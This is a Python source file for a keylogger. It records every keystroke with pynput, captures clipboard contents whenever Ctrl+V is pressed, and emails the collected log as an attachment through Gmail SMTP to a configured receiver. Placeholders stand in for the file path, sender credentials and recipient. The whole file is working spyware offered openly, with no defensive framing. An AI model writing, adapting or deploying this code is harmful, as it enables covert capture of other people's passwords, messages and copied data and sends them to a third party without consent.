from pynput.keyboard import Key, Listener
import keyboard
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import win32clipboard

#                                  ****** All variables are declared here ******

file_path = "PATH\\TO\\YOUR\\FILE"          # please provide your file path
log_file = "logger.txt"                     # file name to save key strokes
clipboard_file = "clipboard_data.txt"       # file name to save clipboard data
sender_addr = "ENTER-SENDER-MAIL"           # sender email address
send_mail_pass = "SENDER-MAIL-PASSWORD"     # password of sender mail
reciever_addr = "ENTER-RECIEVER-MAIL"       # reciever email address
keys = []
count = 0


#                                   ****** Email sending code block ******

def send_mail(filename, attachment, toaddr):

    fromaddr = sender_addr
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Mail from key logger"
    body = "This mail consists of an attachment that contains the log file generated by keylogger program"
    msg.attach(MIMEText(body, 'plain'))

    filename = filename
    attachment = open(attachment, 'rb')

    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, send_mail_pass)
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()


#                                   ****** Clipboard data sniffer code block ******

def clipboard_data():
    with open(file_path + clipboard_file, 'a') as cf:
        try:
            win32clipboard.OpenClipboard()
            data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()

            cf.write("\n\t\t\t\t\t\t****** COPIED-CLIPBOARD-DATA ****** \n\n" + data)
        except:

            cf.write("\n\t\t\t\t\t\t****** COPIED-CLIPBOARD-DATA ****** \n\n" + "fatal: unable to open clipboard.")

 
#                                   ****** Key logger code block ******

def onPress(key):
    global keys, count

    keys.append(key)
    count += 1
    # print(keys)

    if count >= 1:
        writer(keys)
        keys = []
        count = 0


def onRelease(key):         # whenever "esc" key is pressed the program will be terminated
    if key == Key.esc:
        return False

def writer(key_strokes):
    with open(file_path + log_file, 'a') as logger:
        for i in key_strokes:
            words = str(i).replace("'", "")

            if words.find("space") > 0:     # whenever there is space it writes data in new line
                logger.write('\n')
                logger.close()

            elif words.find("Key") == -1:   # it ignores the other key naming (eg. key.space)
                logger.write(words)
                logger.close() 
            
            if keyboard.is_pressed("Ctrl + v"):     # when Ctrl+v is pressed it fetches the recent copied data
                clipboard_data()

if __name__ == '__main__':

    # it listens for key strokes and send them to the functions
    with Listener(on_press=onPress, on_release=onRelease) as l:
        l.join()

    send_mail(log_file, file_path + log_file, reciever_addr)

